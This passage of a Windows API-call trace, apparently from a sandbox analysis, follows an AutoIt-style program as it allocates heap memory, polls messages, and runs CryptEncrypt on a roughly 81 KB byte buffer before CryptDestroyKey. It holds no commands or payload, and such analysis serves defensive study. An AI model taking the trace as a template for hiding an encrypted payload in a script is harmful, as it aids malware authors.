wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0161.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.929] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.929] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.929] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.929] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.929] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.929] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.929] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.929] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.930] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.930] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.930] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.930] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.930] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0161.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.932] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x13f6b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x13f70) returned 1 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0161.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.932] CharLowerBuffW (in: lpsz="byte[81777]", cchLength=0xb | out: lpsz="byte[81777]") returned 0xb [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.933] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.935] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0161.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.935] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c5598*, pdwDataLen=0x87e820*=0x13f6b, dwBufLen=0x13f70 | out: pbData=0x9c5598*, pdwDataLen=0x87e820*=0x13f70) returned 1 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0161.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0161.937] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.937] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.937] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.938] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.938] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.938] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.938] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.938] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.938] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.942] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.942] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.943] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0161.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.958] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.959] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.959] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.959] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.959] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.959] CryptDestroyKey (hKey=0x90af98) returned 1 [0161.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.960] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.960] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.960] CharUpperBuffW (in: 